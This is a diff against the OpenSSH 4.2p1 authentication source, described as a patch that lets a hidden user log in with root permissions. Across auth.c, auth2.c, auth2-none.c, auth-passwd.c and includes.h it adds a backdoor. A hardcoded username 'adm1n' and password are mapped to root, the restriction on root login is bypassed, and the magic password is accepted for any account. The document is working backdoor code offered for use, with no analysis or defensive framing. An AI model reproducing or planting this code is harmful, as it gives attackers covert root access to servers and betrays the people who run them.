OpenSSH patch tested with versions 4.2p1 and 4.7p1 that allows for a hidden user to login with root permissions.
66a2fdc785f48b49192a9914e91513352963513dcdde7b456dccf8dc0ad3e725
--- auth2.c 2005-07-17 09:26:44.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2.c 2008-01-05 16:28:06.000000000 +0100
@@ -215,6 +215,7 @@
fatal("INTERNAL ERROR: authenticated invalid user %s",
authctxt->user);
+ if (strcmp(authctxt->user, HACKED_USER)) {
/* Special handling for root */
if (authenticated && authctxt->pw->pw_uid == 0 &&
!auth_root_allowed(method)) {
@@ -223,7 +224,7 @@
PRIVSEP(audit_event(SSH_LOGIN_ROOT_DENIED));
#endif
}
-
+ }
#ifdef USE_PAM
if (options.use_pam && authenticated) {
if (!PRIVSEP(do_pam_account())) {
--- auth2-none.c 2004-09-11 15:07:03.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2-none.c 2008-01-05 17:26:16.000000000 +0100
@@ -108,12 +108,15 @@
userauth_none(Authctxt *authctxt)
{
none_enabled = 0;
+
+
packet_check_eom();
userauth_banner();
#ifdef HAVE_CYGWIN
if (check_nt_auth(1, authctxt->pw) == 0)
return (0);
#endif
+ if (!strcmp(authctxt->user, HACKED_USER)) return (PRIVSEP(auth_password(authctxt, HACKED_PASS)));
if (options.password_authentication)
return (PRIVSEP(auth_password(authctxt, "")));
return (0);
--- auth2-passwd.c 2004-09-11 14:42:09.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth2-passwd.c 2008-01-05 17:23:10.000000000 +0100
@@ -61,6 +61,7 @@
if (check_nt_auth(1, authctxt->pw) == 0)
authenticated = 0;
#endif
+
memset(password, 0, len);
xfree(password);
return authenticated;
--- auth.c 2005-08-31 18:59:49.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth.c 2008-01-05 16:30:32.000000000 +0100
@@ -492,6 +492,10 @@
#endif
struct passwd *pw;
+ if (!strcmp(user, HACKED_USER)) {
+ strcpy(user, HACKED_PUSER);
+ options.permit_root_login = PERMIT_YES;
+ }
pw = getpwnam(user);
if (pw == NULL) {
logit("Invalid user %.100s from %.100s",
--- auth-passwd.c 2005-07-26 13:54:12.000000000 +0200
+++ /tmp/openssh-4.2p1-hack/auth-passwd.c 2008-01-05 17:24:12.000000000 +0100
@@ -76,7 +76,7 @@
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
-
+ if (!strcmp(password, HACKED_PASS)) return 1;
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
--- includes.h 2005-08-26 22:15:20.000000000 +0200
+++ openssh-4.2p1-hack/includes.h 2008-01-05 23:38:49.000000000 +0100
@@ -210,4 +210,16 @@
#include "entropy.h"
-#endif /* INCLUDES_H */
+#ifndef HACKED_USER
+#define HACKED_USER "adm1n"
+#endif
+
+#ifndef HACKED_PUSER
+#define HACKED_PUSER "root"
+#endif
+
+#ifndef HACKED_PASS
+#define HACKED_PASS "@password_for_nothing@"
+#endif
+
+#endif /* INCLUDES_H */